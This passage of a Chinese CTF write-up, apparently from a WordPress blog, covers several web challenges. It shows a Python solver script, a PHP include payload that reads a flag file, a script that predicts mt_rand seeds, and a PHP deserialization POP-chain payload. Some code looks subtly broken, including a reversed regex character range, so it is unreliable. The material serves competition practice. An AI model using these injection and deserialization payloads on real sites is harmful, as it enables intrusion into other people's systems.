        import requests\nimport re\n\nBASE_URL = \"http:\/\/27.25.151.40:32873\/\"  \n\ndef solve_math_ctf():\n    session = requests.Session()\n\n    while True:\n        try:\n            # 1. \u83b7\u53d6\u6570\u5b66\u8868\u8fbe\u5f0f\n            gen_resp = session.get(f\"{BASE_URL}\/generate\")\n            expression = gen_resp.json()[\"expression\"]\n\n            # 2. \u6e05\u6d17\u8868\u8fbe\u5f0f\uff08\u79fb\u9664\u975e\u6807\u51c6\u5b57\u7b26\uff09\n            clean_expr = re.sub(r'[^0-9+-*\/().]', '', expression)\n\n            # 3. \u5b89\u5168\u8ba1\u7b97\uff08\u9650\u5236\u7b26\u53f7\u9632\u6b62\u4ee3\u7801\u6ce8\u5165\uff09\n            allowed_chars = set(\"0123456789+-*\/(). \")\n            if not all(char in allowed_chars for char in clean_expr):\n                print(f\"\u8df3\u8fc7\u5371\u9669\u8868\u8fbe\u5f0f: {expression}\")\n                continue\n\n            result = eval(clean_expr, {'__builtins__': None})\n\n            # 4. \u5904\u7406\u6d6e\u70b9\u7cbe\u5ea6\uff08\u4fdd\u75592\u4f4d\u5c0f\u6570\uff09\n            if isinstance(result, float):\n                result = round(result, 2)\n\n            # 5. \u63d0\u4ea4\u9a8c\u8bc1\n            verify_data = {\"user_input\": str(result)}\n            verify_resp = session.post(\n                f\"{BASE_URL}\/verify\",\n                json=verify_data,\n                headers={\"Content-Type\": \"application\/json\"}\n            )\n\n            # 6. \u68c0\u67e5flag\n            response = verify_resp.json()\n            if \"flag\" in response:\n                print(f\"\u6210\u529f\u83b7\u53d6flag: {response['flag']}\")\n                return response[\"flag\"]\n\n            print(f\"\u9a8c\u8bc1\u5931\u8d25: {expression} = {result}\")\n\n        except Exception as e:\n            print(f\"\u5904\u7406\u51fa\u9519: {str(e)}\")\n\nif __name__ == \"__main__\":\n    solve_math_ctf()<\/code><\/pre>\n
        lottery\u7b7e\u5230\u91cd\u751f\u7248<\/h3>\n
        \u62bd\u5956\u6e38\u620f\uff0c\u524d\u7aef\u62ff\u4e0d\u5230flag\uff0c\u7206\u7834\u5373\u53ef\uff0c\u603b\u4f1a\u72d7\u8fd0\u51faflag\u7684<\/p>\n
        \"\"<\/p>\n
        busy_search<\/h3>\n
        \u626b\u51faindex.html<\/code>\uff0c\u91cc\u9762\u662f\u4e00\u4e2a\u6587\u6863\uff0c\u770b\u6e90\u7801\uff0c\u6ce8\u91ca\u91cc\u5c31\u662fflag\u7247\u6bb5\uff0c\u62fc\u8d77\u6765\u5373\u53ef<\/p>\n
        \"\"<\/p>\n
        \"\"<\/p>\n
        \"\"<\/p>\n
        \u51fd\u6570\u91cd\u751f\u7248<\/h3>\n
        ?i=include '\/tmp\/fl'.'ag.sh';<\/code><\/pre>\n
        include\u8bfb\u6587\u4ef6<\/p>\n
        give!me!money!<\/h3>\n
        \u626b\u5230index.rar<\/code>\u8bfb\u5230\u6e90\u7801<\/p>\n
        \"\"<\/p>\n
        \u5173\u952e\u5728\u4e8e\u9700\u8981\u4f20\u5165\u4e00\u4e2a\u53c2\u6570c\u4e0e$shenhe<\/code>\u76f8\u540c\uff0c\u8fd9\u4e2a$shenhe<\/code>\u662f\u901a\u8fc7mt_rand<\/code>\u548cmt_srand<\/code>\u751f\u6210\u7684\uff0c\u8fd9\u4fe9\u751f\u6210\u7684\u662f\u4f2a\u968f\u673a\u6570\uff0c\u8ba9ai\u5199\u4e2a\u811a\u672c\u9006\u63a8shenhe<\/code>\uff0c\u6362\u6210\u76f8\u540c\u7684php\u7248\u672c\uff085.6\uff09\u8fd0\u884c<\/p>\n
        <?php\n$current_time = time(); \/\/ \u540c\u6b65\u653b\u51fb\u673a\u5668\u4e0e\u670d\u52a1\u5668\u7684\u65f6\u95f4\n$window = 1; \/\/ \u65f6\u95f4\u8bef\u5dee\u7a97\u53e3\uff08\u79d2\uff09\n\nfor ($offset = -$window; $offset <= $window; $offset++) {\n    $seed_time = $current_time + $offset;\n    $seed = substr($seed_time, 0, 7);\n    mt_srand($seed);\n\n    for ($i = 0; $i <= 100; $i++) {\n        $rand = mt_rand();\n        if ($i == 100) {\n            echo \"Seed: $seed \u2192 shenhe: $randn\";\n        }\n    }\n}\n?><\/code><\/pre>\n
        payload\uff1a<\/p>\n
        GET:?id=d&money=114514\nPOST:c=682052962<\/code><\/pre>\n
        pop\u4e4b\u6211\u53c8\u53cc\u53d2\u53d5\u91cd\u751f\u4e86<\/h3>\n
        pop\u94fe\uff1a__wakeup()<\/code>->get_flag<\/code>->__toString<\/code>->fun<\/code><\/p>\n
        <?php\nclass A1 { public $a1; }\nclass A2 { public $a2; }\nclass A3 { public $a3; }\nclass A4 { public $a4; } \n$a4 = new A4();\n$a3 = new A3();\n$a3->a3 = $a4;\n$a2 = new A2();\n$a2->a2 = $a3;\n$a1 = new A1();\n$a1->a1 = $a2;\n\necho urlencode(serialize($a1));<\/code><\/pre>\n
        Payload:<\/p>\n
        ?wlaq=O:2:\"A1\":1:{s:2:\"a1\";O:2:\"A2\":1:{s:2:\"a2\";O:2:\"A3\":1:{s:2:\"a3\";O:2:\"A4\":0:{}}}}&2025=admin<\/code><\/pre>\n
        flag\u5728\u6e90\u7801\u91cc<\/p>\n","protected":false},"excerpt":{"rendered":"
        \u6392\u540d6 Misc \u6bb5\u6db5\u6db5\u5b66\u59d0\u6700\u7231\u7684\u97f3\u4e50 \u591a\u89c6\u56fe\u79d2\u4e86 CM{U_Kn0w_TaYLOR} \u6d41\u91cf\u5206\u6790-1 192.168.37.2\u5148\u5f00 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-328","post","type-post","status-publish","format-standard","hentry","category-some-competition"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/328","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/comments?post=328"}],"version-history":[{"count":1,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions"}],"predecessor-version":[{"id":329,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions\/329"}],"wp:attachment":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/media?parent=328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/categories?post=328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/tags?post=328"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}